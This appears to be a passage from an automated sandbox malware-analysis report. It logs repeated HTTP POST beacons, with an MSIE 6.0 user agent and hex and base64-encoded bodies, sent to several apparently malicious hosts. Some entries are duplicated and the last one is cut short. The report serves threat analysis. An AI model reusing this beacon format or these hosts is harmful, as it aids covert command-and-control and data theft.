                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 36 4b 75 6a 57 39 34 72 4b 64 6a 6f 61 2f 36 76 4b 61 47 75 35 73 48 6b 30 56 41 65 51 38 69 42 38 74 6e 4f 79 72 35 47 63 67 4f 4b 4d 42 77 74 7a 77 55 49 45 37 74 50 73 61 75 36 43 32 4f 4c 78 44 6e 70 41 45 77 69 43 68 6b 66 62 4b 43 4b 52 31 36 32 4e 63 49 34 38 65 51 34 4b 44 47 37 6d 70 30 69 58 77 56 49 4b 58 73 69 70 38 57 47 78 50 7a 72 54 6c 33 30 79 37 51 6b 7a 51 6b 36 4e 48 38 44 39 6d 4d 30 33 41 6a 33 41 73 31 4a 55 51 49 39 47 67 48 43 73 70 38 63 32 79 66 32 59 6c 4b 4a 30 67 6c 47 68 74 2b 39 51 2f 4d 6a 31 31 70 2f 65 57 44 4b 6a 69 43 30 68 46 70 61 4e 65 70 4e 73 41 6a 70 30 34 6e 57 52 50 71 53 37 46 47 49 57 62 56 47 63 79 47 53 46 41 2f 37 52 71 43 77 5a 4d 30 45 62 75 51 79 33 68 62 37 67 57 69 32 55 4a 4a 35 76 59 32 74 4b 58 59 61 63 4f 36 43 75 63 70 4c 78 4a 4f 73 55 36 64 79 35 67 75 46 65 45 70 36 37 75 75 41 6c 51 37 6d 47 36 69 4c 4a 34 71 61 61 56 41 4a 34 6f 56 31 37 48 6b 30 42 6d 66 77 39 72 65 69 4d 30 35 79 67 79 66 51 50 78 6c 58 55 2b 68 44 71 64 4a 4c 30 61 56 51 36 35 34 55 6b 4c 39 35 2b 42 41 7a 78 49 5a 43 32 6b 74 77 32 47 49 73 5a 44 35 72 4e 46 4b 4b 2b 47 6a 6f 4f 54 59 77 6a 66 43 51 44 6d 75 66 33 6b 57 54 42 2b 74 45 5a 48 38 56 72 51 63 75 77 47 78 5a 6e 79 55 5a 77 4f 44 63 4f 57 49 72 4b 70 65 64 31 58 34 51 49 79 6a 52 4f 6c 73 4e 39 4e 48 6a 30 69 4b 43 33 79 51 2b 46 70 66 70 32 4e 52 79 6d 79 37 57 39 75 2f 69 71 57 4b 70 34 55 37 32 69 65 57 67 52 70 30 53 47 37 59 77 57 62 34 6b 66 4d 39 73 53 30 56 48 6c 79 78 38 66 4b 72 73 30 44 39 36 30 75 64 6a 37 48 57 75 54 31 67 5a 66 64 34 67 65 54 73 7a 61 4e 6b 71 50 53 49 4b 37 65 38 42 35 52 76 69 70 32 50 63 55 39 55 3d Data Ascii: 6KujW94rKdjoa/6vKaGu5sHk0VAeQ8iB8tnOyr5GcgOKMBwtzwUIE7tPsau6C2OLxDnpAEwiChkfbKCKR162NcI48eQ4KDG7mp0iXwVIKXsip8WGxPzrTl30y7QkzQk6NH8D9mM03Aj3As1JUQI9GgHCsp8c2yf2YlKJ0glGht+9Q/Mj11p/eWDKjiC0hFpaNepNsAjp04nWRPqS7FGIWbVGcyGSFA/7RqCwZM0EbuQy3hb7gWi2UJJ5vY2tKXYacO6CucpLxJOsU6dy5guFeEp67uuAlQ7mG6iLJ4qaaVAJ4oV17Hk0Bmfw9reiM05ygyfQPxlXU+hDqdJL0aVQ654UkL95+BAzxIZC2ktw2GIsZD5rNFKK+GjoOTYwjfCQDmuf3kWTB+tEZH8VrQcuwGxZnyUZwODcOWIrKped1X4QIyjROlsN9NHj0iKC3yQ+Fpfp2NRymy7W9u/iqWKp4U72ieWgRp0SG7YwWb4kfM9sS0VHlyx8fKrs0D960udj7HWuT1gZfd4geTszaNkqPSIK7e8B5Rvip2PcU9U=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 4b 33 78 2f 63 41 48 4b 51 74 69 6d 2f 69 41 4b 34 4a 74 6f 6a 74 72 64 4e 31 4e 2f 2b 39 6d 56 78 51 43 4e 38 4a 52 2b 71 43 49 73 75 61 34 6a 4c 51 62 72 37 76 63 4b 54 2f 67 39 34 65 66 4a 45 63 2f 56 31 72 76 52 77 52 4a 63 46 62 64 63 51 57 66 4c 50 73 43 65 71 65 37 48 59 58 61 48 62 34 74 75 75 66 34 31 4d 72 73 6b 36 43 71 51 59 72 64 6f 51 75 4f 77 45 46 5a 42 79 78 38 38 36 6b 52 47 52 32 63 4e 57 52 54 78 33 30 37 62 46 6a 67 56 4a 6f 4b 44 2f 75 46 61 78 47 41 74 70 67 48 56 52 58 57 69 2b 71 7a 4e 78 44 38 50 31 46 64 63 62 72 79 57 52 6b 48 30 4a 34 45 6f 75 42 72 41 72 71 66 46 57 54 77 38 65 55 36 48 6e 48 76 71 33 57 32 59 42 4c 42 57 57 6a 61 75 76 2b 49 54 6c 62 67 61 2b 48 4f 51 30 47 5a 65 55 30 6f 6f 37 49 46 31 76 69 44 30 6a 44 50 6f 58 75 72 6e 6a 56 6f 6b 66 68 78 31 4f 48 2b 73 4f 31 5a 6a 4a 4f 2f 68 66 76 38 49 43 54 38 37 75 67 41 2b 4c 6d 53 64 57 64 4b 42 30 58 7a 57 67 65 51 34 2b 47 48 4a 32 4c 70 5a 68 62 67 55 78 77 2b 4d 4d 42 64 62 44 4f 50 6e 4d 35 65 36 32 39 78 44 32 45 63 39 6a 4d 55 6e 6e 2f 4b 36 42 59 57 38 58 38 2f 65 66 4b 44 6b 42 6a 69 43 42 61 35 46 61 43 79 72 46 4c 73 52 61 67 7a 58 58 65 78 6f 34 61 4e 47 55 37 53 6c 4f 6f 4d 64 46 66 35 4c 33 73 61 43 63 54 53 58 64 51 73 69 74 73 73 54 58 4c 65 64 65 58 48 4c 66 4e 6c 67 31 35 74 72 44 44 44 4c 67 31 2b 70 41 51 66 71 52 41 71 52 48 58 79 58 64 2b 49 6a 77 4f 74 64 4a 2f 6e 33 42 6e 53 5a 46 56 54 41 53 37 44 38 5a 66 4f 50 7a 78 74 6f 46 55 41 63 4c 72 4e 50 49 51 72 73 73 6f 34 37 71 4f 51 6d 2b 6f 72 54 42 6a 59 49 70 45 74 69 75 53 4d 32 79 57 2b 78 67 59 2b 63 64 73 73 51 79 42 31 69 6f 45 72 69 4c 6f 32 57 53 30 68 76 Data Ascii: K3x/cAHKQtim/iAK4JtojtrdN1N/+9mVxQCN8JR+qCIsua4jLQbr7vcKT/g94efJEc/V1rvRwRJcFbdcQWfLPsCeqe7HYXaHb4tuuf41Mrsk6CqQYrdoQuOwEFZByx886kRGR2cNWRTx307bFjgVJoKD/uFaxGAtpgHVRXWi+qzNxD8P1FdcbryWRkH0J4EouBrArqfFWTw8eU6HnHvq3W2YBLBWWjauv+ITlbga+HOQ0GZeU0oo7IF1viD0jDPoXurnjVokfhx1OH+sO1ZjJO/hfv8ICT87ugA+LmSdWdKB0XzWgeQ4+GHJ2LpZhbgUxw+MMBdbDOPnM5e629xD2Ec9jMUnn/K6BYW8X8/efKDkBjiCBa5FaCyrFLsRagzXXexo4aNGU7SlOoMdFf5L3saCcTSXdQsitssTXLedeXHLfNlg15trDDDLg1+pAQfqRAqRHXyXd+IjwOtdJ/n3BnSZFVTAS7D8ZfOPzxtoFUAcLrNPIQrsso47qOQm+orTBjYIpEtiuSM2yW+xgY+cdssQyB1ioEriLo2WS0hv
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 45 53 62 33 62 66 43 30 51 74 67 68 4c 56 49 36 41 38 4e 5a 64 36 50 5a 33 79 69 59 7a 69 48 30 4a 50 74 32 54 35 70 37 62 57 2b 48 76 75 7a 66 46 34 57 59 65 37 41 55 51 75 79 38 30 2b 5a 49 4d 75 42 69 6d 38 59 37 57 49 34 44 72 75 57 51 6e 54 36 4d 6b 30 74 69 5a 4f 77 4d 61 45 4f 6e 74 30 6d 51 38 4c 6b 67 30 63 79 4f 64 51 41 56 6c 6c 6c 42 41 6f 36 49 7a 71 68 4b 72 73 34 6c 4f 47 58 50 75 64 74 2f 42 44 34 64 6a 4d 56 44 41 41 6e 53 44 5a 6e 6f 59 37 45 36 56 66 2f 70 41 53 6c 5a 4a 61 74 4e 61 49 5a 66 33 41 56 71 59 4f 6d 62 4c 45 67 45 4d 6c 39 6b 73 58 48 56 63 47 61 41 76 6b 72 4f 4e 65 4b 67 68 57 70 44 57 45 55 6e 42 59 4b 6e 53 70 35 31 71 61 4e 4c 4d 6d 2b 56 48 33 54 41 42 54 57 30 2b 57 6a 43 35 45 31 41 38 44 2b 39 77 4b 7a 52 75 4f 42 74 57 38 4c 54 47 7a 52 59 74 66 59 67 70 65 75 30 4d 34 57 4c 6e 34 50 43 37 6c 37 6b 4a 57 44 70 55 6e 34 57 55 49 78 5a 4a 5a 6e 71 6b 49 45 53 56 72 34 54 6e 6e 44 76 59 6b 30 33 52 41 4d 31 74 50 48 6e 4e 32 59 6e 37 4d 67 4d 63 38 34 65 65 37 73 76 43 44 51 38 42 73 6a 6b 63 41 44 65 39 54 47 46 30 53 35 6d 32 65 6f 66 73 38 6c 4b 58 73 46 35 6e 57 45 53 75 63 55 59 6c 66 36 50 4b 53 6d 54 42 4d 66 35 51 79 54 4b 6e 68 41 76 78 74 76 6b 71 5a 70 79 74 71 2f 73 58 67 67 67 7a 56 31 6a 61 4f 52 47 49 64 6c 41 51 5a 7a 6c 55 2f 73 50 4e 63 47 69 4d 53 41 43 36 69 79 68 64 34 76 34 54 73 70 31 4e 45 38 62 42 7a 36 58 57 49 2b 6e 4a 6f 69 58 38 2b 70 53 44 56 6b 52 30 6c 78 34 2b 61 38 54 57 42 6c 51 53 67 75 58 4b 34 4b 6f 54 68 31 6e 6c 30 62 70 75 76 77 72 36 5a 64 76 6b 71 37 33 2f 6d 59 6c 4f 64 4e 47 4d 73 56 6b 4e 4d 4d 69 58 4d 44 57 46 4a 35 42 35 6d 51 3d Data Ascii: ESb3bfC0QtghLVI6A8NZd6PZ3yiYziH0JPt2T5p7bW+HvuzfF4WYe7AUQuy80+ZIMuBim8Y7WI4DruWQnT6Mk0tiZOwMaEOnt0mQ8Lkg0cyOdQAVlllBAo6IzqhKrs4lOGXPudt/BD4djMVDAAnSDZnoY7E6Vf/pASlZJatNaIZf3AVqYOmbLEgEMl9ksXHVcGaAvkrONeKghWpDWEUnBYKnSp51qaNLMm+VH3TABTW0+WjC5E1A8D+9wKzRuOBtW8LTGzRYtfYgpeu0M4WLn4PC7l7kJWDpUn4WUIxZJZnqkIESVr4TnnDvYk03RAM1tPHnN2Yn7MgMc84ee7svCDQ8BsjkcADe9TGF0S5m2eofs8lKXsF5nWESucUYlf6PKSmTBMf5QyTKnhAvxtvkqZpytq/sXgggzV1jaORGIdlAQZzlU/sPNcGiMSAC6iyhd4v4Tsp1NE8bBz6XWI+nJoiX8+pSDVkR0lx4+a8TWBlQSguXK4KoTh1nl0bpuvwr6Zdvkq73/mYlOdNGMsVkNMMiXMDWFJ5B5mQ=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 4b 33 78 2f 63 41 48 4b 51 74 69 6d 2f 69 41 4b 34 4a 74 6f 6a 74 72 64 4e 31 4e 2f 2b 39 6d 56 78 51 43 4e 38 4a 52 2b 71 43 49 73 75 61 34 6a 4c 51 62 72 37 76 63 4b 54 2f 67 39 34 65 66 4a 45 63 2f 56 31 72 76 52 77 52 4a 63 46 62 64 63 51 57 66 4c 50 73 43 65 71 65 37 48 59 58 61 48 62 34 74 75 75 66 34 31 4d 72 73 6b 36 43 71 51 59 72 64 6f 51 75 4f 77 45 46 5a 42 79 78 38 38 36 6b 52 47 52 32 63 4e 57 52 54 78 33 30 37 62 46 6a 67 56 4a 6f 4b 44 2f 75 46 61 78 47 41 74 70 67 48 56 52 58 57 69 2b 71 7a 4e 78 44 38 50 31 46 64 63 62 72 79 57 52 6b 48 30 4a 34 45 6f 75 42 72 41 72 71 66 46 57 54 77 38 65 55 36 48 6e 48 76 71 33 57 32 59 42 4c 42 57 57 6a 61 75 76 2b 49 54 6c 62 67 61 2b 48 4f 51 30 47 5a 65 55 30 6f 6f 37 49 46 31 76 69 44 30 6a 44 50 6f 58 75 72 6e 6a 56 6f 6b 66 68 78 31 4f 48 2b 73 4f 31 5a 6a 4a 4f 2f 68 66 76 38 49 43 54 38 37 75 67 41 2b 4c 6d 53 64 57 64 4b 42 30 58 7a 57 67 65 51 34 2b 47 48 4a 32 4c 70 5a 68 62 67 55 78 77 2b 4d 4d 42 64 62 44 4f 50 6e 4d 35 65 36 32 39 78 44 32 45 63 39 6a 4d 55 6e 6e 2f 4b 36 42 59 57 38 58 38 2f 65 66 4b 44 6b 42 6a 69 43 42 61 35 46 61 43 79 72 46 4c 73 52 61 67 7a 58 58 65 78 6f 34 61 4e 47 55 37 53 6c 4f 6f 4d 64 46 66 35 4c 33 73 61 43 63 54 53 58 64 51 73 69 74 73 73 54 58 4c 65 64 65 58 48 4c 66 4e 6c 67 31 35 74 72 44 44 44 4c 67 31 2b 70 41 51 66 71 52 41 71 52 48 58 79 58 64 2b 49 6a 77 4f 74 64 4a 2f 6e 33 42 6e 53 5a 46 56 54 41 53 37 44 38 5a 66 4f 50 7a 78 74 6f 46 55 41 63 4c 72 4e 50 49 51 72 73 73 6f 34 37 71 4f 51 6d 2b 6f 72 54 42 6a 59 49 70 45 74 69 75 53 4d 32 79 57 2b 78 67 59 2b 63 64 73 73 51 79 42 31 69 6f 45 72 69 4c 6f 32 57 53 30 68 76 Data Ascii: K3x/cAHKQtim/iAK4JtojtrdN1N/+9mVxQCN8JR+qCIsua4jLQbr7vcKT/g94efJEc/V1rvRwRJcFbdcQWfLPsCeqe7HYXaHb4tuuf41Mrsk6CqQYrdoQuOwEFZByx886kRGR2cNWRTx307bFjgVJoKD/uFaxGAtpgHVRXWi+qzNxD8P1FdcbryWRkH0J4EouBrArqfFWTw8eU6HnHvq3W2YBLBWWjauv+ITlbga+HOQ0GZeU0oo7IF1viD0jDPoXurnjVokfhx1OH+sO1ZjJO/hfv8ICT87ugA+LmSdWdKB0XzWgeQ4+GHJ2LpZhbgUxw+MMBdbDOPnM5e629xD2Ec9jMUnn/K6BYW8X8/efKDkBjiCBa5FaCyrFLsRagzXXexo4aNGU7SlOoMdFf5L3saCcTSXdQsitssTXLedeXHLfNlg15trDDDLg1+pAQfqRAqRHXyXd+IjwOtdJ/n3BnSZFVTAS7D8ZfOPzxtoFUAcLrNPIQrsso47qOQm+orTBjYIpEtiuSM2yW+xgY+cdssQyB1ioEriLo2WS0hv
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 36 4b 75 6a 57 39 34 72 4b 64 6a 6f 61 2f 36 76 4b 61 47 75 35 73 48 6b 30 56 41 65 51 38 69 42 38 74 6e 4f 79 72 35 47 63 67 4f 4b 4d 42 77 74 7a 77 55 49 45 37 74 50 73 61 75 36 43 32 4f 4c 78 44 6e 70 41 45 77 69 43 68 6b 66 62 4b 43 4b 52 31 36 32 4e 63 49 34 38 65 51 34 4b 44 47 37 6d 70 30 69 58 77 56 49 4b 58 73 69 70 38 57 47 78 50 7a 72 54 6c 33 30 79 37 51 6b 7a 51 6b 36 4e 48 38 44 39 6d 4d 30 33 41 6a 33 41 73 31 4a 55 51 49 39 47 67 48 43 73 70 38 63 32 79 66 32 59 6c 4b 4a 30 67 6c 47 68 74 2b 39 51 2f 4d 6a 31 31 70 2f 65 57 44 4b 6a 69 43 30 68 46 70 61 4e 65 70 4e 73 41 6a 70 30 34 6e 57 52 50 71 53 37 46 47 49 57 62 56 47 63 79 47 53 46 41 2f 37 52 71 43 77 5a 4d 30 45 62 75 51 79 33 68 62 37 67 57 69 32 55 4a 4a 35 76 59 32 74 4b 58 59 61 63 4f 36 43 75 63 70 4c 78 4a 4f 73 55 36 64 79 35 67 75 46 65 45 70 36 37 75 75 41 6c 51 37 6d 47 36 69 4c 4a 34 71 61 61 56 41 4a 34 6f 56 31 37 48 6b 30 42 6d 66 77 39 72 65 69 4d 30 35 79 67 79 66 51 50 78 6c 58 55 2b 68 44 71 64 4a 4c 30 61 56 51 36 35 34 55 6b 4c 39 35 2b 42 41 7a 78 49 5a 43 32 6b 74 77 32 47 49 73 5a 44 35 72 4e 46 4b 4b 2b 47 6a 6f 4f 54 59 77 6a 66 43 51 44 6d 75 66 33 6b 57 54 42 2b 74 45 5a 48 38 56 72 51 63 75 77 47 78 5a 6e 79 55 5a 77 4f 44 63 4f 57 49 72 4b 70 65 64 31 58 34 51 49 79 6a 52 4f 6c 73 4e 39 4e 48 6a 30 69 4b 43 33 79 51 2b 46 70 66 70 32 4e 52 79 6d 79 37 57 39 75 2f 69 71 57 4b 70 34 55 37 32 69 65 57 67 52 70 30 53 47 37 59 77 57 62 34 6b 66 4d 39 73 53 30 56 48 6c 79 78 38 66 4b 72 73 30 44 39 36 30 75 64 6a 37 48 57 75 54 31 67 5a 66 64 34 67 65 54 73 7a 61 4e 6b 71 50 53 49 4b 37 65 38 42 35 52 76 69 70 32 50 63 55 39 55 3d Data Ascii: 6KujW94rKdjoa/6vKaGu5sHk0VAeQ8iB8tnOyr5GcgOKMBwtzwUIE7tPsau6C2OLxDnpAEwiChkfbKCKR162NcI48eQ4KDG7mp0iXwVIKXsip8WGxPzrTl30y7QkzQk6NH8D9mM03Aj3As1JUQI9GgHCsp8c2yf2YlKJ0glGht+9Q/Mj11p/eWDKjiC0hFpaNepNsAjp04nWRPqS7FGIWbVGcyGSFA/7RqCwZM0EbuQy3hb7gWi2UJJ5vY2tKXYacO6CucpLxJOsU6dy5guFeEp67uuAlQ7mG6iLJ4qaaVAJ4oV17Hk0Bmfw9reiM05ygyfQPxlXU+hDqdJL0aVQ654UkL95+BAzxIZC2ktw2GIsZD5rNFKK+GjoOTYwjfCQDmuf3kWTB+tEZH8VrQcuwGxZnyUZwODcOWIrKped1X4QIyjROlsN9NHj0iKC3yQ+Fpfp2NRymy7W9u/iqWKp4U72ieWgRp0SG7YwWb4kfM9sS0VHlyx8fKrs0D960udj7HWuT1gZfd4geTszaNkqPSIK7e8B5Rvip2PcU9U=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.maktraxx.comCache-Control: no-cacheData Raw: 46 43 7a 2b 61 4a 71 4c 51 74 68 33 71 65 65 67 76 57 5a 35 58 64 32 72 47 56 57 4b 55 2b 5a 65 62 76 39 73 6d 6d 37 4f 50 6f 63 2f 4c 6e 67 45 35 78 4a 4d 57 79 63 36 78 72 6a 58 6d 65 78 5a 32 71 6a 33 58 78 70 2b 47 57 6d 79 59 6d 39 44 63 7a 54 76 78 7a 43 30 72 6a 71 55 79 77 35 4a 72 78 66 56 54 62 35 34 51 77 43 32 6d 6b 4f 59 53 39 36 53 70 51 63 58 63 6b 44 30 52 70 62 45 68 37 75 61 42 36 68 4c 6b 53 55 48 33 59 38 46 52 6e 31 2b 69 36 70 67 4e 34 4c 66 6d 39 41 74 4c 42 42 4c 52 53 77 50 4a 45 58 32 64 6f 72 6d 4f 39 6c 66 6f 6f 78 68 2b 6c 51 42 78 4e 37 77 79 4d 42 4b 30 55 68 6a 4f 59 6e 4b 49 43 76 2f 5a 63 47 36 76 33 37 69 41 64 69 33 4e 70 39 67 6d 57 57 50 33 62 7a 32 53 4c 48 73 42 74 77 74 2f 78 71 6f 34 53 75 36 72 4a 50 49 51 42 79 6d 47 6c 7a 77 4d 48 32 79 4e 67 31 43 76 47 37 54 59 32 47 58 2b 31 4e 50 53 58 6d 36 55 6d 2b 42 38 52 49 55 63 74 4c 4a 35 78 4b 65 71 4b 36 39 4e 4a 55 45 55 4e 44 44 54 67 74 51 38 74 71 65 6a 53 42 69 6c 64 73 45 65 2b 35 78 67 6b 30 35 73 4c 67 5a 6e 36 79 78 6f 52 63 4e 65 45 6d 63 53 59 79 30 48 4d 39 54 62 78 79 41 34 61 4f 6b 35 58 57 48 63 45 4b 32 64 6d 34 6f 6c 67 77 36 58 76 49 58 68 6a 64 45 73 42 36 48 48 56 43 6c 5a 45 46 51 63 59 4b 63 4f 4b 44 4d 78 57 42 2f 65 5a 6f 58 61 57 47 39 61 42 49 75 67 76 46 71 62 4c 62 39 78 72 45 6b 76 6f 6d 71 6a 36 37 6d 35 70 33 42 6b 34 37 41 43 75 78 4d 44 53 65 51 4c 47 53 70 67 4c 71 4e 47 59 61 66 6e 52 41 59 48 72 61 59 5a 32 56 55 74 32 6f 49 50 42 51 79 6b 37 46 51 36 41 5a 50 4b 46 64 68 4e 36 5a 7a 77 56 4b 4a 67 74 51 47 33 4a 38 4a 6e 4e 69 61 68 6e 5a 33 39 56 7a 53 69 46 6b 45 61 54 69 6d 54 42 5a 33 2b 50 6d 38 4d 42 7a 4e 53 63 49 54 74 47 65 2f 50 41 3d 3d Data Ascii: FCz+aJqLQth3qeegvWZ5Xd2rGVWKU+Zebv9smm7OPoc/LngE5xJMWyc6xrjXmexZ2qj3Xxp+GWmyYm9DczTvxzC0rjqUyw5JrxfVTb54QwC2mkOYS96SpQcXckD0RpbEh7uaB6hLkSUH3Y8FRn1+i6pgN4Lfm9AtLBBLRSwPJEX2dormO9lfooxh+lQBxN7wyMBK0UhjOYnKICv/ZcG6v37iAdi3Np9gmWWP3bz2SLHsBtwt/xqo4Su6rJPIQBymGlzwMH2yNg1CvG7TY2GX+1NPSXm6Um+B8RIUctLJ5xKeqK69NJUEUNDDTgtQ8tqejSBildsEe+5xgk05sLgZn6yxoRcNeEmcSYy0HM9TbxyA4aOk5XWHcEK2dm4olgw6XvIXhjdEsB6HHVClZEFQcYKcOKDMxWB/eZoXaWG9aBIugvFqbLb9xrEkvomqj67m5p3Bk47ACuxMDSeQLGSpgLqNGYafnRAYHraYZ2VUt2oIPBQyk7FQ6AZPKFdhN6ZzwVKJgtQG3J8JnNiahnZ39VzSiFkEaTimTBZ3+Pm8MBzNScITtGe/PA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 34 65 2b 61 61 47 47 49 51 74 68 51 39 4e 62 73 77 49 61 66 43 7a 6f 50 64 34 42 66 53 59 4e 38 4a 62 32 52 45 4f 62 49 6e 77 6f 6e 74 30 2f 72 65 59 37 49 63 74 74 72 59 5a 6b 48 6e 74 43 4d 79 2b 51 52 30 4a 52 35 34 62 7a 4a 54 33 67 50 71 4e 34 75 45 32 6b 2f 48 50 37 4a 6f 2b 46 37 6a 76 38 37 6f 4b 52 49 32 4a 46 58 6c 66 4b 68 6c 41 6b 37 51 38 46 32 6b 54 66 73 36 73 77 47 51 4f 74 4f 50 69 49 41 4f 51 31 56 56 46 64 5a 64 44 55 41 37 6e 39 45 71 63 68 4e 32 54 48 51 39 4e 46 49 7a 78 31 79 76 75 57 6c 4c 6e 6d 39 45 6c 4c 30 52 73 48 62 4e 44 4e 43 34 34 58 71 6f 73 76 41 6e 77 4e 63 46 2f 72 54 6b 62 5a 70 2b 6b 42 37 6b 48 6a 4d 6b 39 66 62 71 65 52 70 56 41 73 76 52 53 6a 79 69 2b 77 55 6c 47 70 4e 51 41 4e 76 43 6a 4c 4d 43 42 6b 53 39 68 46 43 5a 4f 41 2f 36 6f 32 5a 32 37 54 30 6b 41 2f 76 46 6e 48 47 4d 42 62 38 65 55 32 4f 4d 57 31 36 31 54 46 51 5a 7a 4c 31 55 33 39 4e 65 38 54 55 74 78 42 4b 30 41 65 6e 4e 55 74 2f 74 67 44 6c 6c 6b 6c 4f 4f 4e 42 34 73 7a 56 53 69 4a 47 77 39 78 55 53 41 66 72 52 49 47 44 37 71 76 47 54 4e 68 4c 49 42 71 7a 33 4a 39 36 51 73 6d 70 62 58 74 51 4a 2b 48 6a 44 4e 68 74 74 47 7a 4a 42 5a 6c 4a 4f 39 65 58 56 36 73 50 49 41 79 4d 7a 76 63 79 53 6b 6b 56 68 50 39 56 4d 42 33 35 6c 32 79 55 56 43 6e 56 56 4e 71 51 37 35 4e 61 77 76 4d 34 73 50 75 71 65 46 68 35 42 46 48 55 75 47 64 73 34 74 76 70 34 39 79 69 2b 71 44 2b 44 6f 6f 48 39 49 69 61 55 6c 66 2b 35 78 61 57 53 67 45 58 70 4c 56 73 48 63 63 71 51 35 38 50 38 50 68 70 72 4e 65 2f 52 62 66 54 49 52 2f 33 32 73 6e 5a 6b 64 37 59 33 6f 77 7a 66 4f 4f 31 34 72 72 76 64 49 64 4a 71 45 78 72 78 54 62 41 32 69 41 3d 3d Data Ascii: 4e+aaGGIQthQ9NbswIafCzoPd4BfSYN8Jb2REObInwont0/reY7IcttrYZkHntCMy+QR0JR54bzJT3gPqN4uE2k/HP7Jo+F7jv87oKRI2JFXlfKhlAk7Q8F2kTfs6swGQOtOPiIAOQ1VVFdZdDUA7n9EqchN2THQ9NFIzx1yvuWlLnm9ElL0RsHbNDNC44XqosvAnwNcF/rTkbZp+kB7kHjMk9fbqeRpVAsvRSjyi+wUlGpNQANvCjLMCBkS9hFCZOA/6o2Z27T0kA/vFnHGMBb8eU2OMW161TFQZzL1U39Ne8TUtxBK0AenNUt/tgDllklOONB4szVSiJGw9xUSAfrRIGD7qvGTNhLIBqz3J96QsmpbXtQJ+HjDNhttGzJBZlJO9eXV6sPIAyMzvcySkkVhP9VMB35l2yUVCnVVNqQ75NawvM4sPuqeFh5BFHUuGds4tvp49yi+qD+DooH9IiaUlf+5xaWSgEXpLVsHccqQ58P8PhprNe/RbfTIR/32snZkd7Y3owzfOO14rrvdIdJqExrxTbA2iA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 34 59 53 42 35 32 48 76 77 42 44 6d 57 41 34 45 77 4d 45 55 56 6a 6f 4f 37 63 42 66 66 42 75 74 4a 64 51 61 7a 71 4c 46 44 41 37 4d 59 64 7a 4f 56 33 70 73 72 4b 41 42 57 36 6a 38 6a 49 42 66 41 61 39 49 76 6a 6b 70 62 72 71 42 75 4d 74 57 4f 30 69 35 65 59 73 68 53 6a 63 70 63 4d 73 4d 62 62 58 62 74 6f 44 37 69 38 5a 79 54 48 41 64 53 48 32 54 6e 74 72 66 2b 34 79 71 6b 33 58 57 77 6b 75 2f 47 2b 75 34 47 44 70 52 54 6d 78 7a 45 56 38 52 39 71 63 7a 50 4a 41 49 30 71 55 42 4a 52 78 35 59 6b 63 78 6a 58 43 48 65 36 54 43 5a 47 49 56 45 73 64 38 36 32 50 36 49 5a 41 32 33 46 76 45 7a 45 71 57 7a 44 51 50 30 51 6a 74 55 77 6e 4d 63 78 42 7a 72 68 59 4c 2b 64 67 4a 43 74 30 37 56 36 30 2f 78 67 66 78 61 6d 4d 41 35 42 6c 41 73 67 51 62 65 58 46 42 6b 39 42 46 56 5a 73 5a 77 32 65 51 43 6a 63 42 6f 4b 76 41 4b 45 44 71 46 39 4a 6a 54 64 2f 47 42 51 4b 39 7a 41 59 56 52 4e 79 49 67 41 72 4f 4d 67 50 6b 37 76 63 4d 67 35 6d 58 65 78 31 53 49 52 53 33 38 6a 4a 43 53 45 34 74 52 2f 37 79 62 67 46 6a 41 6e 64 69 65 53 77 43 5a 68 6e 34 4e 5a 75 6d 30 54 6d 44 39 6e 4f 65 58 61 49 46 61 48 34 74 33 69 52 4e 61 34 67 65 2f 67 4e 47 38 43 70 39 6e 35 59 4a 4d 41 42 42 34 39 2b 38 75 57 50 6b 75 59 54 6f 55 49 43 63 68 47 67 50 4e 4a 71 48 69 54 71 39 54 6a 52 59 4f 48 5a 4b 67 31 38 55 6d 50 69 53 36 6c 41 4d 66 45 70 6e 76 68 63 4a 71 31 42 56 49 54 4c 59 56 4d 4c 7a 59 42 75 77 49 37 56 78 69 74 39 79 6d 69 73 4e 76 75 33 4d 52 30 47 62 64 37 77 59 42 77 6c 33 6e 4f 35 6f 47 31 6c 51 58 57 45 39 55 31 6c 68 68 56 54 65 55 37 51 45 2b 32 6b 46 32 32 46 51 4a 51 61 75 59 4b 57 61 63 36 77 48 49 43 55 7a 48 44 4e 39 6e 53 4d 3d Data Ascii: 